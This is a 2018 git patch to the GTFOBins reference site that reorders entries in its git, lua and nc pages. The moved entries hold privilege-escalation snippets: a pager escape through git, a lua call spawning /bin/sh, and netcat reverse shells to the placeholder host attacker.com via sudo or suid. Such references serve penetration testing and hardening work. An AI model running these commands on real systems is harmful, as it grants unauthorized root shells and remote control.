From 0f422cdd6a5daef288c3785dd1307997e4d698a0 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Sun, 22 Jul 2018 15:42:43 +0100 Subject: [PATCH] Reorder functions in git, lua, and nc --- _gtfobins/git.md | 8 ++++---- _gtfobins/lua.md | 4 ++-- _gtfobins/nc.md | 12 ++++++------ 3 files changed, 12 insertions(+), 12 deletions(-) diff --git a/_gtfobins/git.md b/_gtfobins/git.md index 812c7ba..ac0095c 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -4,12 +4,12 @@ functions: - code: | export PAGER=/usr/bin/id git -p help - suid-limited: - - code: | - export PAGER=/usr/bin/id - ./git -p help sudo-enabled: - code: | export PAGER=/usr/bin/id sudo -E git -p help + suid-limited: + - code: | + export PAGER=/usr/bin/id + ./git -p help --- diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md index 4830413..d2f45ef 100644 --- a/_gtfobins/lua.md +++ b/_gtfobins/lua.md @@ -59,8 +59,8 @@ functions: - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' file-read: - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' - suid-limited: - - code: ./lua -e 'os.execute("/bin/sh")' sudo-enabled: - code: sudo lua -e 'os.execute("/bin/sh")' + suid-limited: + - code: ./lua -e 'os.execute("/bin/sh")' --- diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index f72cf91..d0f253a 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -24,16 +24,16 @@ functions: LPORT=12345 LFILE=file_to_save nc -l -p $LPORT > "$LFILE" - suid-limited: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. - code: | - RHOST=attacker.com - RPORT=12345 - ./nc -e /bin/sh $RHOST $RPORT sudo-enabled: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com RPORT=12345 sudo nc -e /bin/sh $RHOST $RPORT + suid-limited: + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. + code: | + RHOST=attacker.com + RPORT=12345 + ./nc -e /bin/sh $RHOST $RPORT ---